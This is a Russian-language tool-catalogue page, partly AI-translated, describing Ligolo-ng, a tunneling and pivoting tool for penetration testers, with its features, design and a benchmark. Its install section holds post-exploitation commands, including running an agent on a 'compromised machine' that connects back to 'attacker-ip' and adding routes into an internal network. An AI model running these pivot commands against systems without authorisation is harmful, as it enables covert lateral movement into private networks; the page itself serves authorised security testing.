Ligolo-ng

Exploitation ★ Рекомендуемый v0.8.3 · 15.02.2026 активный

Продвинутый инструмент для туннелирования и пивотинга в сети с использованием TUN-интерфейса. Позволяет прозрачно направлять трафик через скомпрометированные хосты без socks-proxy. Возможности: - Прозрачный туннель через TUN-интерфейс (не SOCKS) - Любые инструменты работают как с прямым доступом к сети - Мультиплексирование: несколько агентов через один listener - Двойной пивотинг: agent → agent - Зашифрованный TLS-туннель - Агенты под Linux, Windows, macOS - Поддержка UDP-трафика

v0.8.3
15.02.2026 current
Добавлен 19.06.2026 · Обновлён 19.06.2026 · Exploitation
Установка
# Скачать релизы (proxy + agent):
# https://github.com/nicocha30/ligolo-ng/releases

# На хосте атакующего (proxy):
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601

# На скомпрометированной машине (agent):
./agent -connect attacker-ip:11601 -ignore-cert

# В консоли proxy:
session          # выбрать агента
ifconfig         # посмотреть сети агента
start            # запустить туннель

# Добавить маршрут к внутренней сети:
sudo ip route add 192.168.1.0/24 dev ligolo
переведено ИИ

Ligolo-ng : Туннелирование как VPN

Ligolo Logo)

Продвинутый, но при этом простой инструмент для туннелирования, использующий интерфейсы TUN.

GPLv3 Go Report GitHub Sponsors GitHub Downloads (all assets, all releases)

📑 Документация Ligolo-ng (Настройка/Быстрый старт)

[!TIP] Ligolo-ng 0.8 добавил множество новых функций, включая: - 🌐 API и удобный веб-интерфейс благодаря L'ami du Raisin, поддерживающий мультиплеер! - ⚙️ Простой файл конфигурации для сохранения настроек туннелирования/прокси - 🚦 Режим демона для запуска Ligolo-ng как службы - 🔗 Автоматическая привязка для автоматической настройки туннелирования при подключении определённого агента - 📶 Простое и автоматическое (autoroute) управление маршрутизацией и интерфейсами на Windows, Linux, MacOS и BSD! - 💀 Завершение агента для удалённого отключения агента

Попробуйте! Релиз: Ligolo-ng 0.8

Ligolo Web)

Содержание

Введение

Ligolo-ng — это простой, лёгкий и быстрый инструмент, который позволяет пентестерам устанавливать туннели через обратное TCP/TLS-соединение с использованием интерфейса tun (без необходимости в SOCKS).

Возможности

  • Интерфейс TUN (Больше никаких SOCKS/Proxychains!)
  • Простой интерфейс с выбором агента и сетевой информацией
  • Простота использования и настройки
  • Автоматическая настройка сертификатов с помощью Let's Encrypt
  • Высокая производительность (мультиплексирование)
  • Не требует привилегий на агенте
  • Прослушивание/привязка сокетов на агенте
  • Поддержка множества платформ для агента
  • Может обрабатывать несколько туннелей
  • Обратное/прямое соединение
  • Автоматическое восстановление туннелей/слушателей (в случае проблем с сетью)
  • Поддержка WebSocket

Демо

Ligolo-ng-demo.webm

Чем это отличается от Ligolo/Chisel/Meterpreter...?

Вместо использования SOCKS-прокси или TCP/UDP-форвардеров, Ligolo-ng создаёт сетевой стек в пользовательском пространстве с помощью Gvisor.

При запуске сервера ретрансляции/прокси используется интерфейс tun, пакеты, отправленные на этот интерфейс, транслируются и затем передаются в удалённую сеть агента.

Например, для TCP-соединения:

  • SYN транслируется в connect() на удалённом сервере
  • SYN-ACK отправляется обратно, если connect() выполнен успешно
  • RST отправляется, если системные вызовы возвращают ECONNRESET, ECONNABORTED или ECONNREFUSED после connect
  • Ничего не отправляется при тайм-ауте

Это позволяет запускать такие инструменты, как nmap, без использования proxychains (проще и быстрее).

Как использовать - документация - руководство

Документация Ligolo-ng, а также шаги для его запуска и настройки доступны на странице Документация Ligolo-ng

Требуются ли права администратора/root?

На стороне агента — нет! Всё можно выполнить без административных прав.

Однако на вашем сервере ретрансляции/прокси необходимо иметь возможность создавать интерфейс tun.

Поддерживаемые протоколы/пакеты

  • TCP
  • UDP
  • ICMP (запросы эха)

Производительность

Легко можно достичь более 100 Мбит/с. Вот тест с помощью iperf с сервера на 200 Мбит/с к соединению на 200 Мбит/с.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval           Transfer     Bitrate         Retr  Cwnd
[  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes       
[  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes       
[  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes       
[  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes       
[  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes       
[  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes       
[  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes       
[  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes       
[  5]   8.00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes       
[  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender
[  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver

Ограничения

Поскольку агент работает без привилегий, невозможно пересылать необработанные пакеты. При выполнении NMAP SYN-SCAN выполняется TCP connect() на агенте.

При использовании nmap следует использовать --unprivileged или -PE для избежания ложноположительных результатов.

Планы

  • Реализовать другие ICMP-сообщения об ошибках (это ускорит UDP-сканирования) ;
  • Не отправлять RST при получении ACK от недействительного TCP-соединения (nmap будет отмечать хост как активный) ;
  • Добавить поддержку mTLS.

Авторы

  • Nicolas Chatelain
  • Jeremie Bedjai (Ligolo-ng-Web)
Комментарии
Войдите, чтобы оставить комментарий